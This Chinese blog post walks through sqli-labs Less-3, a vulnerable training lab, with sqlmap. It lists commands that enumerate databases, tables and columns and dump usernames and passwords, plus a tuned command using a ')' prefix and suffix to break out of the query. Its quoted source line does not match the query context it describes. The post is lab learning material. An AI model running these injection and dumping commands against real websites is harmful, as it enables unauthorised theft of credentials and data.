网络安全-sqlmap实战之sqlilabs-Less3

目录

类型

注入判断

-dbs枚举数据库

-tables枚举表

 -columns枚举列

-dump枚举数据

查看源代码

---

类型

字符串转换错误，他又提示输入数字型ID，应该是把数字转换为了字符串

注入判断

截图

 结合课程1，猜测sql语句为

select * from users where id = ('参数') LIMIT 0,1

-dbs枚举数据库

python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-3/?id=1" -dbs

4种注入方式

 

枚举数据库

-tables枚举表

python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-3/?id=1" --dbms mysql -D security -tables

枚举表

 -columns枚举列

python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-3/?id=1" --dbms mysql -D security -T users -columns

枚举列

-dump枚举数据

python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-3/?id=1" --dbms mysql -D security -T users -C username,password -dump

枚举数据

查看源代码

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

 今后的课程应该会更难，我将添加已知信息，比如，已知数据库为mysql，则使用--dbms，已知部分sql信息，例如本次课程的()，使用--prefix和--suffix，以及-o、--threads等进行优化，例如：

python sqlmap.py -u "192.168.172.128/sqli-labs_1/Less-3/?id=1" --dbms mysql --prefix="')" --suffix=" AND ('abc'='abc'" -o  -D security -T users -C username,password -dump

 sqlmap使用参考下方文章中的sqlmap使用笔记。

更多内容查看：网络安全-自学笔记

有问题请下方评论，转载请注明出处，并附有原文链接，谢谢！如有侵权，请及时联系。